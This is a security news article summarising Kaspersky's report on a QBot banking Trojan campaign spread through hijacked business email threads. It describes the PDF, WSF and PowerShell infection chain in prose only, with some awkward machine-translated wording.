Malicious spam email campaigns have been observed to increasingly spread banking Trojans from the QBot (or Qakbot) family using fake business emails.
Kaspersky security researchers discovered malicious campaigns that relied on messages written in different languages, including English, German, Italian, and French.
“The messages were based on actual business letters accessed by the attackers, giving the attackers the opportunity to participate in the communication thread with their own messages,” reads an advisory issued by the company today.
The post, authored by Kaspersky security experts Victoria Vlasova, Andrey Kovtun, and Darya Ivanova, explains that these emails typically prompt the recipient to open an attached PDF file. .
“Such simulated business communications can thwart spam tracking and increase the chances of victims being scammed,” explain Vlasova, Kovtun, and Ivanova.
“For believability, the attacker put the sender’s name from a previous letter in the ‘From’ field. However, the sender’s fraudulent email her address is different from the actual correspondent’s address. ”
After clicking on the attachment, the email will download the attachment from a remote server and protect it with the password provided in the original PDF file. The downloaded archive contains a WSF (Windows Script File) file containing an obfuscated script written in JScript.
“Once the WSF file is deobfuscated, its true payload is revealed: a PowerShell script encoded in Base64 lines,” Kaspersky wrote. “As soon as the user opens his WSF file from the archive, a PowerShell script is run discreetly on the computer and uses wget to download his DLL file from his remote server.”
Kaspersky said the newly discovered Trojan variants are not very different from those seen previously.
“As before, bots can extract passwords and cookies from browsers, steal characters from mailboxes, intercept traffic, and provide operators with remote access to infected systems,” says Tech. read the article.
For more information on Qbot malware, see Qakbot, Analyzing a Modern-day Banking Trojan.
Some variants can download additional malware tools such as CobaltStrike (to spread the infection across corporate networks) and ransomware. Kaspersky also confirms that some of his Qbot versions turn the victim’s computer into a proxy for her server, facilitating traffic redirection.
The latest Qbot campaign primarily targeted users from Germany (28.01%), Argentina (9.78%) and Italy (9.58%). It comes months after Qbot was discovered as the most prevalent malware, surpassing his Emotet in December 2022. Since then, Emotet has regained the top spot on Check Point’s list.
